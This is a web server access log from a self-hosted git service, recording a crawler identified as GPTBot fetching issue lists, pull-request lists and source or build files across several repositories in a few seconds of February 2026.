- 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1%2freply%2ftoolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 27830] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:36:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html?display=rendered" [Client 74.7.227.38] [Length 11104] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.html" -[17/Feb/2026:19:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11301] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:19:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10259] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:36:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10083] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:36:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs?display=rendered" [Client 74.7.227.38] [Length 11214] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" -[17/Feb/2026:19:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:36:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:36:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:36:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:36:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9956] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9954] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10135] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:19:36:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10136] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10145] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=open&type=all" -[17/Feb/2026:19:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:36:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:36:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:36:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:36:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:36:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:36:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:36:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:36:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" -[17/Feb/2026:19:36:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:36:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13416] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:19:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11337] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11363] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:36:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11338] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=source" [Client 74.7.227.38] [Length 12536] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:19:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=source" [Client 74.7.227.38] [Length 12560] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:19:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 